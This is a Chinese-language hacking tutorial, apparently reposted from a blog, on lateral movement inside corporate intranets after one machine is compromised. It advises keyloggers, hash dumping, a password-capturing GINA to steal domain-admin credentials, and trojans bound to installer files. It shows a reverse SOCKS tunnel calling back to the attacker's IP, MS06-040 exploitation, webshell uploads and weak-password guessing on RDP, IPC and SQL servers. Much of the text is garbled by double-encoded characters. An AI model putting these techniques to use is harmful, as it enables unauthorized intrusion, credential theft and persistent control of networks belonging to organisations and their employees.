内网渗透常用手法
作者:凋凌玫瑰
來(lái)源:NCPH
內(nèi)網(wǎng),很多人應(yīng)該形成了這個(gè)概念,很多大型網(wǎng)絡(luò)的外部網(wǎng)站或是服務(wù)器不一定有用,當(dāng)然外網(wǎng)也是一個(gè)突破口。很多時(shí)候我們直接從外網(wǎng)入手,隨著安 全的不斷加固,已變得越來(lái)越困難。那么黑客通常是怎么進(jìn)行內(nèi)網(wǎng)滲透的,內(nèi)網(wǎng)滲透又是怎樣與社會(huì)工程學(xué)聯(lián)系起來(lái)呢,今天主要描述黑客內(nèi)網(wǎng)滲透的常用操作手 法,關(guān)于如何獲得內(nèi)網(wǎng)機(jī)器,請(qǐng)查找我以前的一篇文章《內(nèi)網(wǎng)滲透—如何打開(kāi)突破口》。
滲透的過(guò)程就是一個(gè)信息刺探、利用、思考、突破的過(guò)程。首先在我們獲得一臺(tái)內(nèi)網(wǎng)的機(jī)器后應(yīng)該怎么做,當(dāng)然是信息刺探。
一.信息刺探
1. 當(dāng) 前機(jī)器的人物身份,當(dāng)前控制的這臺(tái)機(jī)器人物是一個(gè)什么樣的身份,客服、銷(xiāo)售人員還是開(kāi)發(fā)人員,還是管理員。客服會(huì)做些什么,會(huì)通過(guò)什么方式跟其它人聯(lián)系; 開(kāi)發(fā)人員在開(kāi)發(fā)什么,應(yīng)該會(huì)跟管理員聯(lián)系,也會(huì)有一定的外網(wǎng)管理權(quán)限和內(nèi)網(wǎng)測(cè)試服務(wù)器,這種情況下內(nèi)網(wǎng)測(cè)試服務(wù)器是可以搞定的。如果是客服機(jī)器或是銷(xiāo)售人 員機(jī)器呢,他一定有整個(gè)公司或是網(wǎng)絡(luò)的聯(lián)系方式,自己發(fā)揮想象去。是管理員機(jī)器的話(huà)就不用說(shuō)。
2. 當(dāng)前網(wǎng)絡(luò)結(jié)構(gòu)的分析,是域結(jié)構(gòu),還是劃分vlan的結(jié)構(gòu),大多數(shù)大型網(wǎng)絡(luò)是域結(jié)構(gòu)。一般外網(wǎng)的服務(wù)器都是有硬件防火墻的,并且指定內(nèi)網(wǎng)的某些機(jī)器的mac才可以連接。所以我們先看看內(nèi)網(wǎng)情況:
C:\WINNT\system32>net view
伺服器名稱(chēng) 說(shuō)明
——————————————————————————-
\\2007ACC
\\ABS-XP
\\ACER-TS250 NAS 4BAY SATA
\\ACER-TS500 NAS 4BAY SATA
\\ACER6100
\\AKIRA-WU akira-wu
\\ALICECHEN
\\AMYCHIU
\\ANDY2007
\\ANDYTEST01
\\ANNHUANG
\\ANNIEKUO
\\APOLLO
\\APOPO
\\ARTSERVER
\\AUGTCHIEN
\\AVSERVER
\\BENLEE01
\\BENSON-NB
…
先用net view查看內(nèi)網(wǎng)的情況,列出的機(jī)器就是在網(wǎng)絡(luò)結(jié)構(gòu)中有聯(lián)系的機(jī)器,但不一定都在一個(gè)網(wǎng)段,所以ping出這些機(jī)器的ip,以便分析大概有哪些網(wǎng)段.
3.了解本機(jī)在網(wǎng)絡(luò)中所占的角色
先ipconfig /all看下是否在域中,如圖:
從上圖,我們可以得知,存在一個(gè)域xxxx,從內(nèi)網(wǎng)ip來(lái)看,應(yīng)該還存在很多個(gè)段,內(nèi)網(wǎng)很大。我們ping 一下域xxxx,得到域服務(wù)器的ip.
我們?cè)賮?lái)看一下本機(jī)在域里面的角色,如圖:
看來(lái)只是一個(gè)普通域用戶(hù).我們?cè)賮?lái)查看一下域里面的用戶(hù).如圖:
…
域里面的用戶(hù)很多,那么我們?cè)俨榭匆幌掠蚬芾韱T有哪些:
從上面我們掌握了內(nèi)網(wǎng)的大概信息。下面我們進(jìn)一步利用這些信息。
二.信息的利用:
1. 首 先是內(nèi)網(wǎng)占據(jù)的這臺(tái)機(jī)器,要做幾個(gè)必要的措施:1)種鍵盤(pán)記錄,記錄其可能登錄的密碼,有用的。2)抓hash跑密碼,主要查看密碼規(guī)則是否有規(guī)律,它的 密碼也可以去試下其它機(jī)器的密碼,看是否通用。3)種gina,這一步主要不是記錄當(dāng)前用戶(hù)的密碼,而是為了來(lái)記錄域管理員的登錄密碼,因?yàn)橛蚬芾韱T是有 權(quán)限登錄下面每臺(tái)用戶(hù)的機(jī)器的,gina是可以記到的,記到域管理密碼后,內(nèi)網(wǎng)在域中的機(jī)器就可以全部控制了。4)給占據(jù)機(jī)器上的備用安裝文件或是備用驅(qū) 動(dòng)上綁馬,此是為了防止對(duì)方重裝機(jī)器,馬就掉了。
2. 反彈socks代理。
在內(nèi)網(wǎng)滲透中,反彈socks代理是很必要的,大家都知道用lcx來(lái)轉(zhuǎn)發(fā)端口,好像很少看到有人是直接反彈代理來(lái)連接。因?yàn)槲覀円B接內(nèi)網(wǎng)的其 它機(jī)器,我們不可能一個(gè)一個(gè)的去中轉(zhuǎn)端口連接,在當(dāng)前控制的機(jī)器上開(kāi)代理也沒(méi)辦法,因?yàn)閷?duì)方在內(nèi)網(wǎng)。所以我們就用反彈代理的方式。這種方式其實(shí)大家都明 白。
首先在本機(jī)監(jiān)聽(tīng):
c:\>hd -s -listen 53 1180
[+] Listening ConnectBack Port 53 ……
[+] Listen OK!
[+] Listening Socks5 Agent Port 1180 ……
[+] Listen2 OK!
[+] Waiting for MainSocket on port:53 ……
此命令是將連接進(jìn)來(lái)的53端口的數(shù)據(jù)包連接到1180端口。
在對(duì)方機(jī)器上運(yùn)行:
C:\RECYCLER>hd -s -connect x.x.x.x 53
[+] MainSocket Connect to x.x.x.x:53 Success!
[+] Send Main Command ok!
[+] Recv Main Command ok!
[+] Send Main Command again ok!
上面的x.x.x.x為你的外網(wǎng)ip,下面為你接收到反彈回來(lái)的代理顯示的情況。
c:\>hd -s -listen 53 1180
[+] Listening ConnectBack Port 53 ……
[+] Listen OK!
[+] Listening Socks5 Agent Port 1180 ……
[+] Listen2 OK!
[+] Waiting for MainSocket on port:53 ……
[+] Recv Main Command Echo ok!
[+] Send Main Command Echo ok!
[+] Recv Main Command Echo again ok!
[+] Get a MainSocket on port 53 from x.x.x.x ……
[+] Waiting Client on Socks5 Agent Port:1180….
上面ok了,接下來(lái)在你本機(jī)安裝sockscap,照下圖設(shè)置就ok了。
Sockscap設(shè)置在控制臺(tái)的”文件”-“設(shè)置”里,控制臺(tái)可以將你需要代理的程序放在上面,直接拖進(jìn)去即可,控制臺(tái)機(jī)的程序就可以進(jìn)接連接 內(nèi)網(wǎng)的機(jī)器了。如直接用mstsc連接內(nèi)網(wǎng)其它機(jī)器的3389,就可以上去試密碼或是登錄管理,也可以用mssql連接內(nèi)網(wǎng)的1433,嘗試sa弱口令 等。總之反彈socks是你利用已控制的內(nèi)網(wǎng)機(jī)器通向內(nèi)網(wǎng)其它機(jī)器的一道橋梁。
三.思考:
信息有了,通道有了,接下來(lái)我們?cè)趺醋?#xff1f;
1. 內(nèi)網(wǎng)溢出,通過(guò)對(duì)內(nèi)網(wǎng)的掃描情況,判斷win2000的機(jī)器,利用ms06040進(jìn)行運(yùn)程溢出。
2. 內(nèi)網(wǎng)web,通過(guò)內(nèi)網(wǎng)的掃描,用sockscap上的ie來(lái)打開(kāi)內(nèi)網(wǎng)開(kāi)放的web,在內(nèi)網(wǎng)采用web注入或上傳的方式來(lái)獲取webshell提權(quán)。
3. 內(nèi)網(wǎng)弱口令試探,利用ipc,或是3389,和已掌握的密碼信息來(lái)嘗試猜解內(nèi)網(wǎng)nt的密碼,當(dāng)然這需要耐心,也是非常有用的。
4. 猜解sql弱口令,在sockscap控制臺(tái)中用sql連接器連接內(nèi)網(wǎng)開(kāi)放1433或是3306的機(jī)器,猜解弱口令。
5. 內(nèi)網(wǎng)嗅探,不得已的辦法,不推薦。
6. 內(nèi)網(wǎng)主動(dòng)會(huì)話(huà)劫持,篇幅長(zhǎng),難度高,下次詳寫(xiě)。
四.突破:
突破是考驗(yàn)經(jīng)驗(yàn)和思維的時(shí)候,利用已掌握的信息去突破面臨的困難。如,如何拿到第一臺(tái)內(nèi)網(wǎng)服務(wù)器站穩(wěn)腳;如何拿到內(nèi)網(wǎng)到外網(wǎng)授權(quán)的機(jī)器;如何拿到外網(wǎng)密碼。
在內(nèi)網(wǎng)中站穩(wěn)腳后,迅速判斷管理員機(jī)器,控制管理員的機(jī)器極為重要。一般從機(jī)器名可以看出管理員機(jī)器,管理員的機(jī)器名常為:andy 、admin 、peter、 kater,在域控的環(huán)境中,我們只要得到域控密碼就可以直接用ipc連接管理員機(jī)器種馬。不是域控的環(huán)境中,我們也可以在內(nèi)網(wǎng)測(cè)試服務(wù)器中跑出服務(wù)器的 密碼進(jìn)而拿去嘗試管理員的密碼。
在突破過(guò)程中,內(nèi)網(wǎng)的數(shù)據(jù)庫(kù)和web的分析很重要,數(shù)據(jù)庫(kù)里面有很多有用的信息,web的數(shù)據(jù)庫(kù)連接及作用也有助于進(jìn)一步的分析。總之在這一過(guò)程中只有靈活運(yùn)用,發(fā)散思維才可以進(jìn)一步的突破和控制。
黑客與安全是一個(gè)矛盾話(huà)題,只有知已知彼才能更好地維護(hù)內(nèi)網(wǎng)安全。以上是黑客常用的內(nèi)網(wǎng)滲透手法,知識(shí)有限,文筆粗拙,高手笑過(guò),此文僅供新手科普。
By rose of ncph
轉(zhuǎn)載于:https://www.cnblogs.com/QianshaoStudio/p/5464070.html
總結(jié)
- 上一篇: 常用的十种算法
- 下一篇: eclipse添加约束文件